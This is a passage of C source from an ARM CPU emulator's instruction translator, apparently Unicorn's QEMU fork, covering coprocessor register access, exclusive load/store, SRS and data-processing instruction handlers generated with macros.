*/ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); } /* Handle special cases first */ switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { case ARM_CP_NOP: return 0; case ARM_CP_WFI: if (isread) { return 1; } gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFI; return 0; default: break; } if ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)) { // gen_io_start(tcg_ctx); } if (isread) { /* Read */ if (is64) { TCGv_i64 tmp64; TCGv_i32 tmp; if (ri->type & ARM_CP_CONST) { tmp64 = tcg_const_i64(tcg_ctx, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmp64 = tcg_temp_new_i64(tcg_ctx); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg64(tcg_ctx, tmp64, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tmp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); } tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tmp64); store_reg(s, rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tmp64); tcg_temp_free_i64(tcg_ctx, tmp64); store_reg(s, rt2, tmp); } else { TCGv_i32 tmp; if (ri->type & ARM_CP_CONST) { tmp = tcg_const_i32(tcg_ctx, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmp = tcg_temp_new_i32(tcg_ctx); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tmp = load_cpu_offset(tcg_ctx, ri->fieldoffset); } if (rt == 15) { /* Destination register of r15 for 32 bit loads sets * the condition codes from the high 4 bits of the value */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, rt, tmp); } } } else { /* Write */ if (ri->type & ARM_CP_CONST) { /* If not forbidden by access permissions, treat as WI */ return 0; } if (is64) { TCGv_i32 tmplo, tmphi; TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); tmplo = load_reg(s, rt); tmphi = load_reg(s, rt2); tcg_gen_concat_i32_i64(tcg_ctx, tmp64, tmplo, tmphi); tcg_temp_free_i32(tcg_ctx, tmplo); tcg_temp_free_i32(tcg_ctx, tmphi); if (ri->writefn) { TCGv_ptr tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp64); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_st_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); } tcg_temp_free_i64(tcg_ctx, tmp64); } else { if (ri->writefn) { TCGv_i32 tmp; TCGv_ptr tmpptr; tmp = load_reg(s, rt); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tmp); } else { TCGv_i32 tmp = load_reg(s, rt); store_cpu_offset(tcg_ctx, tmp, ri->fieldoffset); } } } /* I/O operations must end the TB here (whether read or write) */ need_exit_tb = ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)); if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { /* * A write to any coprocessor register that ends a TB * must rebuild the hflags for the next TB. 
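 * (M-profile uses the m32 rebuild helper; A-profile uses the
 * newel variant when the register is marked ARM_CP_NEWEL,
 * i.e. the write may change the current exception level.)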
*/ TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, s->current_el); if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_helper_rebuild_hflags_m32(tcg_ctx, tcg_ctx->cpu_env, tcg_el); } else { if (ri->type & ARM_CP_NEWEL) { gen_helper_rebuild_hflags_a32_newel(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_rebuild_hflags_a32(tcg_ctx, tcg_ctx->cpu_env, tcg_el); } } tcg_temp_free_i32(tcg_ctx, tcg_el); /* * We default to ending the TB on a coprocessor register write, * but allow this to be suppressed by the register definition * (usually only necessary to work around guest bugs). */ need_exit_tb = true; } if (need_exit_tb) { gen_lookup_tb(s); } return 0; } /* Unknown register; this might be a guest error or a QEMU * unimplemented feature. */ if (is64) { qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " "64 bit system register cp:%d opc1: %d crm:%d " "(%s)\n", isread ? "read" : "write", cpnum, opc1, crm, s->ns ? "non-secure" : "secure"); } else { qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " "system register cp:%d opc1:%d crn:%d crm:%d opc2:%d " "(%s)\n", isread ? "read" : "write", cpnum, opc1, crn, crm, opc2, s->ns ? "non-secure" : "secure"); } return 1; } /* Store a 64-bit value to a register pair. Clobbers val. */ static void gen_storeq_reg(DisasContext *s, int rlow, int rhigh, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, val); store_reg(s, rlow, tmp); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, val); store_reg(s, rhigh, tmp); } /* load and add a 64-bit value from a register pair. */ static void gen_addq(DisasContext *s, TCGv_i64 val, int rlow, int rhigh) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp; TCGv_i32 tmpl; TCGv_i32 tmph; /* Load 64-bit value rd:rn. */ tmpl = load_reg(s, rlow); tmph = load_reg(s, rhigh); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, tmp, tmpl, tmph); tcg_temp_free_i32(tcg_ctx, tmpl); tcg_temp_free_i32(tcg_ctx, tmph); tcg_gen_add_i64(tcg_ctx, val, val, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } /* Set N and Z flags from hi|lo. */ static void gen_logicq_cc(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, hi); tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, lo, hi); } /* Load/Store exclusive instructions are implemented by remembering the value/address loaded, and seeing if these are the same when the store is performed. This should be sufficient to implement the architecturally mandated semantics, and avoids having to monitor regular stores. The compare vs the remembered value is done during the cmpxchg operation, but we must compare the addresses manually. */ static void gen_load_exclusive(DisasContext *s, int rt, int rt2, TCGv_i32 addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); MemOp opc = size | MO_ALIGN | s->be_data; s->is_ldex = true; if (size == 3) { TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* For AArch32, architecturally the 32-bit word at the lowest * address is always Rt and the one at addr+4 is Rt2, even if * the CPU is big-endian. That means we don't want to do a * gen_aa32_ld_i64(), which invokes gen_aa32_frob64() as if * for an architecturally 64-bit access, but instead do a * 64-bit access using MO_BE if appropriate and then split * the two halves. 
* This only makes a difference for BE32 user-mode, where * frob64() must not flip the two halves of the 64-bit data * but this code must treat BE32 user-mode like BE32 system. */ TCGv taddr = gen_aa32_addr(s, addr, opc); tcg_gen_qemu_ld_i64(tcg_ctx, t64, taddr, get_mem_index(s), opc); tcg_temp_free(tcg_ctx, taddr); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, t64); if (s->be_data == MO_BE) { tcg_gen_extr_i64_i32(tcg_ctx, tmp2, tmp, t64); } else { tcg_gen_extr_i64_i32(tcg_ctx, tmp, tmp2, t64); } tcg_temp_free_i64(tcg_ctx, t64); store_reg(s, rt2, tmp2); } else { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), opc); tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp); } store_reg(s, rt, tmp); tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); } static void gen_clrex(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, TCGv_i32 addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2; TCGv_i64 extaddr; TCGv taddr; TCGLabel *done_label; TCGLabel *fail_label; MemOp opc = size | MO_ALIGN | s->be_data; /* if (env->exclusive_addr == addr && env->exclusive_val == [addr]) { [addr] = {Rt}; {Rd} = 0; } else { {Rd} = 1; } */ fail_label = gen_new_label(tcg_ctx); done_label = gen_new_label(tcg_ctx); extaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, extaddr, addr); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, extaddr, tcg_ctx->cpu_exclusive_addr, fail_label); tcg_temp_free_i64(tcg_ctx, extaddr); taddr = gen_aa32_addr(s, addr, opc); t0 = tcg_temp_new_i32(tcg_ctx); t1 = load_reg(s, rt); if (size == 3) { TCGv_i64 o64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 n64 = tcg_temp_new_i64(tcg_ctx); t2 = load_reg(s, rt2); /* For AArch32, architecturally the 32-bit word at the lowest * address is always Rt and the one at addr+4 is Rt2, even if * the CPU is big-endian. Since we're going to treat this as a * single 64-bit BE store, we need to put the two halves in the * opposite order for BE to LE, so that they end up in the right * places. * We don't want gen_aa32_frob64() because that does the wrong * thing for BE32 usermode. 
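 * (Hence the explicit operand swap on the concat below when
 * the access is big-endian.)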
*/ if (s->be_data == MO_BE) { tcg_gen_concat_i32_i64(tcg_ctx, n64, t2, t1); } else { tcg_gen_concat_i32_i64(tcg_ctx, n64, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, o64, taddr, tcg_ctx->cpu_exclusive_val, n64, get_mem_index(s), opc); tcg_temp_free_i64(tcg_ctx, n64); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, o64, o64, tcg_ctx->cpu_exclusive_val); tcg_gen_extrl_i64_i32(tcg_ctx, t0, o64); tcg_temp_free_i64(tcg_ctx, o64); } else { t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, tcg_ctx->cpu_exclusive_val); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, t0, taddr, t2, t1, get_mem_index(s), opc); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, t0, t0, t2); tcg_temp_free_i32(tcg_ctx, t2); } tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free(tcg_ctx, taddr); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[rd], t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_gen_br(tcg_ctx, done_label); gen_set_label(tcg_ctx, fail_label); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 1); gen_set_label(tcg_ctx, done_label); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } /* gen_srs: * @env: CPUARMState * @s: DisasContext * @mode: mode field from insn (which stack to store to) * @amode: addressing mode (DA/IA/DB/IB), encoded as per P,U bits in ARM insn * @writeback: true if writeback bit set * * Generate code for the SRS (Store Return State) insn. */ static void gen_srs(DisasContext *s, uint32_t mode, uint32_t amode, bool writeback) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int32_t offset; TCGv_i32 addr, tmp; bool undef = false; /* SRS is: * - trapped to EL3 if EL3 is AArch64 and we are at Secure EL1 * and specified mode is monitor mode * - UNDEFINED in Hyp mode * - UNPREDICTABLE in User or System mode * - UNPREDICTABLE if the specified mode is: * -- not implemented * -- not a valid mode number * -- a mode that's at a higher exception level * -- Monitor, if we are Non-secure * For the UNPREDICTABLE cases we choose to UNDEF. */ if (s->current_el == 1 && !s->ns && mode == ARM_CPU_MODE_MON) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), 3); return; } if (s->current_el == 0 || s->current_el == 2) { undef = true; } switch (mode) { case ARM_CPU_MODE_USR: case ARM_CPU_MODE_FIQ: case ARM_CPU_MODE_IRQ: case ARM_CPU_MODE_SVC: case ARM_CPU_MODE_ABT: case ARM_CPU_MODE_UND: case ARM_CPU_MODE_SYS: break; case ARM_CPU_MODE_HYP: if (s->current_el == 1 || !arm_dc_feature(s, ARM_FEATURE_EL2)) { undef = true; } break; case ARM_CPU_MODE_MON: /* No need to check specifically for "are we non-secure" because * we've already made EL0 UNDEF and handled the trap for S-EL1; * so if this isn't EL3 then we must be non-secure. 
*/ if (s->current_el != 3) { undef = true; } break; default: undef = true; } if (undef) { unallocated_encoding(s); return; } addr = tcg_temp_new_i32(tcg_ctx); tmp = tcg_const_i32(tcg_ctx, mode); /* get_r13_banked() will raise an exception if called from System mode */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); gen_helper_get_r13_banked(tcg_ctx, addr, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); switch (amode) { case 0: /* DA */ offset = -4; break; case 1: /* IA */ offset = 0; break; case 2: /* DB */ offset = -8; break; case 3: /* IB */ offset = 4; break; default: abort(); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); tmp = load_reg(s, 14); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_cpu_field(tcg_ctx, spsr); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); tcg_temp_free_i32(tcg_ctx, tmp); if (writeback) { switch (amode) { case 0: offset = -8; break; case 1: offset = 4; break; case 2: offset = -4; break; case 3: offset = 0; break; default: abort(); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); tmp = tcg_const_i32(tcg_ctx, mode); gen_helper_set_r13_banked(tcg_ctx, tcg_ctx->cpu_env, tmp, addr); tcg_temp_free_i32(tcg_ctx, tmp); } tcg_temp_free_i32(tcg_ctx, addr); s->base.is_jmp = DISAS_UPDATE; } /* Generate a label used for skipping this instruction */ static void arm_gen_condlabel(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!s->condjmp) { s->condlabel = gen_new_label(tcg_ctx); s->condjmp = 1; } } /* Skip this instruction if the ARM condition is false */ static void arm_skip_unless(DisasContext *s, uint32_t cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; arm_gen_condlabel(s); arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); } /* * Constant expanders for the decoders. */ static int negate(DisasContext *s, int x) { return -x; } static int plus_2(DisasContext *s, int x) { return x + 2; } static int times_2(DisasContext *s, int x) { return x * 2; } static int times_4(DisasContext *s, int x) { return x * 4; } /* Return only the rotation part of T32ExpandImm. */ static int t32_expandimm_rot(DisasContext *s, int x) { return x & 0xc00 ? extract32(x, 7, 5) : 0; } /* Return the unrotated immediate from T32ExpandImm. */ static int t32_expandimm_imm(DisasContext *s, int x) { uint32_t imm = extract32(x, 0, 8); switch (extract32(x, 8, 4)) { case 0: /* XY */ /* Nothing to do. */ break; case 1: /* 00XY00XY */ imm *= 0x00010001; break; case 2: /* XY00XY00 */ imm *= 0x01000100; break; case 3: /* XYXYXYXY */ imm *= 0x01010101; break; default: /* Rotated constant. */ imm |= 0x80; break; } return imm; } static int t32_branch24(DisasContext *s, int x) { /* Convert J1:J2 at x[22:21] to I2:I1, which involves I=J^~S. */ x ^= !(x < 0) * (3 << 21); /* Append the final zero. */ return x << 1; } static int t16_setflags(DisasContext *s) { return s->condexec_mask == 0; } static int t16_push_list(DisasContext *s, int x) { return (x & 0xff) | (x & 0x100) << (14 - 8); } static int t16_pop_list(DisasContext *s, int x) { return (x & 0xff) | (x & 0x100) << (15 - 8); } /* * Include the generated decoders. */ #include "decode-a32.inc.c" #include "decode-a32-uncond.inc.c" #include "decode-t32.inc.c" #include "decode-t16.inc.c" /* Helpers to swap operands for reverse-subtract. 
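 * RSB and RSC compute rd = operand2 - rn, so each wrapper just
 * calls the underlying subtract with its operands exchanged.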
*/ static void gen_rsb(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 a, TCGv_i32 b) { tcg_gen_sub_i32(tcg_ctx, dst, b, a); } static void gen_rsb_CC(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 a, TCGv_i32 b) { gen_sub_CC(tcg_ctx, dst, b, a); } static void gen_rsc(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 a, TCGv_i32 b) { gen_sub_carry(tcg_ctx, dest, b, a); } static void gen_rsc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 a, TCGv_i32 b) { gen_sbc_CC(tcg_ctx, dest, b, a); } /* * Helpers for the data processing routines. * * After the computation store the results back. * This may be suppressed altogether (STREG_NONE), require a runtime * check against the stack limits (STREG_SP_CHECK), or generate an * exception return. Oh, or store into a register. * * Always return true, indicating success for a trans_* function. */ typedef enum { STREG_NONE, STREG_NORMAL, STREG_SP_CHECK, STREG_EXC_RET, } StoreRegKind; static bool store_reg_kind(DisasContext *s, int rd, TCGv_i32 val, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (kind) { case STREG_NONE: tcg_temp_free_i32(tcg_ctx, val); return true; case STREG_NORMAL: /* See ALUWritePC: Interworking only from a32 mode. */ if (s->thumb) { store_reg(s, rd, val); } else { store_reg_bx(s, rd, val); } return true; case STREG_SP_CHECK: store_sp_checked(s, val); return true; case STREG_EXC_RET: gen_exception_return(s, val); return true; } g_assert_not_reached(); // never reach here return true; } /* * Data Processing (register) * * Operate, with set flags, one register source, * one immediate shifted register source, and a destination. */ static bool op_s_rrr_shi(DisasContext *s, arg_s_rrr_shi *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp2 = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, tmp2, a->shty, a->shim, logic_cc); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxr_shi(DisasContext *s, arg_s_rrr_shi *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, tmp, a->shty, a->shim, logic_cc); gen(tcg_ctx, tmp, tmp); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp); } return store_reg_kind(s, a->rd, tmp, kind); } /* * Data-processing (register-shifted register) * * Operate, with set flags, one register source, * one register shifted register source, and a destination. 
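 * Unlike op_s_rrr_shi, the shift amount comes from a register
 * (a->rs) via gen_arm_shift_reg rather than from an immediate
 * field.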
*/ static bool op_s_rrr_shr(DisasContext *s, arg_s_rrr_shr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp1 = load_reg(s, a->rs); tmp2 = load_reg(s, a->rm); gen_arm_shift_reg(tcg_ctx, tmp2, a->shty, tmp1, logic_cc); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxr_shr(DisasContext *s, arg_s_rrr_shr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp1 = load_reg(s, a->rs); tmp2 = load_reg(s, a->rm); gen_arm_shift_reg(tcg_ctx, tmp2, a->shty, tmp1, logic_cc); gen(tcg_ctx, tmp2, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp2); } return store_reg_kind(s, a->rd, tmp2, kind); } /* * Data-processing (immediate) * * Operate, with set flags, one register source, * one rotated immediate, and a destination. * * Note that logic_cc && a->rot setting CF based on the msb of the * immediate is the reason why we must pass in the unrotated form * of the immediate. */ static bool op_s_rri_rot(DisasContext *s, arg_s_rri_rot *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; uint32_t imm; imm = ror32(a->imm, a->rot); if (logic_cc && a->rot) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, imm >> 31); } tmp2 = tcg_const_i32(tcg_ctx, imm); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxi_rot(DisasContext *s, arg_s_rri_rot *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; uint32_t imm; imm = ror32(a->imm, a->rot); if (logic_cc && a->rot) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, imm >> 31); } tmp = tcg_const_i32(tcg_ctx, imm); gen(tcg_ctx, tmp, tmp); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp); } return store_reg_kind(s, a->rd, tmp, kind); } #define DO_ANY3(NAME, OP, L, K) \ static bool trans_##NAME##_rrri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = (K); return op_s_rrr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rrrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = (K); return op_s_rrr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rri(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = (K); return op_s_rri_rot(s, a, OP, L, k); } #define DO_ANY3_unicorn(NAME, OP, L, K) \ static bool trans_##NAME##_rrri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rrr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rrrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rrr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rri(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rri_rot(s, a, OP, L, k); } #define DO_ANY2(NAME, OP, L, K) \ static bool trans_##NAME##_rxri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = (K); return op_s_rxr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rxrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = (K); return op_s_rxr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rxi(DisasContext *s, 
arg_s_rri_rot *a) \
    { StoreRegKind k = (K); return op_s_rxi_rot(s, a, OP, L, k); }

#define DO_ANY2_unicorn(NAME, OP, L, K) \
    static bool trans_##NAME##_rxri(DisasContext *s, arg_s_rrr_shi *a) \
    { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxr_shi(s, a, OP, L, k); } \
    static bool trans_##NAME##_rxrr(DisasContext *s, arg_s_rrr_shr *a) \
    { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxr_shr(s, a, OP, L, k); } \
    static bool trans_##NAME##_rxi(DisasContext *s, arg_s_rri_rot *a) \
    { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxi_rot(s, a, OP, L, k); }

#define DO_CMP2(NAME, OP, L) \
    static bool trans_##NAME##_xrri(DisasContext *s, arg_s_rrr_shi *a) \
    { return op_s_rrr_shi(s, a, OP, L, STREG_NONE); } \
    static bool trans_##NAME##_xrrr(DisasContext *s, arg_s_rrr_shr *a) \
    { return op_s_rrr_shr(s, a, OP, L, STREG_NONE); } \
    static bool trans_##NAME##_xri(DisasContext *s, arg_s_rri_rot *a) \
    { return op_s_rri_rot(s, a, OP, L, STREG_NONE); }

DO_ANY3(AND, tcg_gen_and_i32, a->s, STREG_NORMAL)
DO_ANY3(EOR, tcg_gen_xor_i32, a->s, STREG_NORMAL)
DO_ANY3(ORR, tcg_gen_or_i32, a->s, STREG_NORMAL)
DO_ANY3(BIC, tcg_gen_andc_i32, a->s, STREG_NORMAL)

DO_ANY3(RSB, a->s ? gen_rsb_CC : gen_rsb, false, STREG_NORMAL)
DO_ANY3(ADC, a->s ? gen_adc_CC : gen_add_carry, false, STREG_NORMAL)
DO_ANY3(SBC, a->s ? gen_sbc_CC : gen_sub_carry, false, STREG_NORMAL)
DO_ANY3(RSC, a->s ? gen_rsc_CC : gen_rsc, false, STREG_NORMAL)

DO_CMP2(TST, tcg_gen_and_i32, true)
DO_CMP2(TEQ, tcg_gen_xor_i32, true)
DO_CMP2(CMN, gen_add_CC, false)
DO_CMP2(CMP, gen_sub_CC, false)

DO_ANY3(ADD, a->s ? gen_add_CC : tcg_gen_add_i32, false,
        a->rd == 13 && a->rn == 13 ? STREG_SP_CHECK : STREG_NORMAL)

/*
 * Note: for SUB and MOV the StoreRegKind depends on the operands, so it
 * is computed by a helper (get_storage3/get_storage2 below) invoked from
 * the DO_ANY*_unicorn expansions; the helper may also clear a->s through
 * its pointer argument before the flag is used by OP.
 */
static StoreRegKind get_storage3(DisasContext *s, int rd, int rn, int *as)
{
    StoreRegKind ret = STREG_NORMAL;

    if (rd == 15 && *as) {
        /*
         * See ALUExceptionReturn:
         * In User mode, UNPREDICTABLE; we choose UNDEF.
         * In Hyp mode, UNDEFINED.
         */
        if (IS_USER(s) || s->current_el == 2) {
            unallocated_encoding(s);
            /* The insn has raised UNDEF; suppress the register store. */
            return STREG_NONE;
        }
        /* There is no writeback of nzcv to PSTATE. */
        *as = 0;
        ret = STREG_EXC_RET;
    } else if (rd == 13 && rn == 13) {
        ret = STREG_SP_CHECK;
    }

    return ret;
}

DO_ANY3_unicorn(SUB, a->s ? gen_sub_CC : tcg_gen_sub_i32, false, get_storage3)

static StoreRegKind get_storage2(DisasContext *s, int rd, int *as)
{
    StoreRegKind ret = STREG_NORMAL;

    if (rd == 15 && *as) {
        /*
         * See ALUExceptionReturn:
         * In User mode, UNPREDICTABLE; we choose UNDEF.
         * In Hyp mode, UNDEFINED.
         */
        if (IS_USER(s) || s->current_el == 2) {
            unallocated_encoding(s);
            /* The insn has raised UNDEF; suppress the register store. */
            return STREG_NONE;
        }
        /* There is no writeback of nzcv to PSTATE. */
        *as = 0;
        ret = STREG_EXC_RET;
    } else if (rd == 13) {
        ret = STREG_SP_CHECK;
    }

    return ret;
}

DO_ANY2_unicorn(MOV, tcg_gen_mov_i32, a->s, get_storage2)
DO_ANY2(MVN, tcg_gen_not_i32, a->s, STREG_NORMAL)

/*
 * ORN is only available with T32, so there is no register-shifted-register
 * form of the insn.  Using the DO_ANY3 macro would create an unused function.
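 *
 * For reference, DO_ANY3(ORN, tcg_gen_orc_i32, a->s, STREG_NORMAL) would
 * expand to roughly this (a sketch of the macro above, not compiled):
 *
 *   static bool trans_ORN_rrri(DisasContext *s, arg_s_rrr_shi *a)
 *   { StoreRegKind k = STREG_NORMAL;
 *     return op_s_rrr_shi(s, a, tcg_gen_orc_i32, a->s, k); }
 *   static bool trans_ORN_rrrr(DisasContext *s, arg_s_rrr_shr *a) ...
 *   static bool trans_ORN_rri(DisasContext *s, arg_s_rri_rot *a)  ...
 *
 * The decoder never references trans_ORN_rrrr, so the expansion would only
 * produce an unused-function warning; the two used forms are hand-written.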
*/ static bool trans_ORN_rrri(DisasContext *s, arg_s_rrr_shi *a) { return op_s_rrr_shi(s, a, tcg_gen_orc_i32, a->s, STREG_NORMAL); } static bool trans_ORN_rri(DisasContext *s, arg_s_rri_rot *a) { return op_s_rri_rot(s, a, tcg_gen_orc_i32, a->s, STREG_NORMAL); } #undef DO_ANY3 #undef DO_ANY2 #undef DO_CMP2 static bool trans_ADR(DisasContext *s, arg_ri *a) { store_reg_bx(s, a->rd, add_reg_for_lit(s, 15, a->imm)); return true; } static bool trans_MOVW(DisasContext *s, arg_MOVW *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6T2) { return false; } tmp = tcg_const_i32(tcg_ctx, a->imm); store_reg(s, a->rd, tmp); return true; } static bool trans_MOVT(DisasContext *s, arg_MOVW *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6T2) { return false; } tmp = load_reg(s, a->rd); 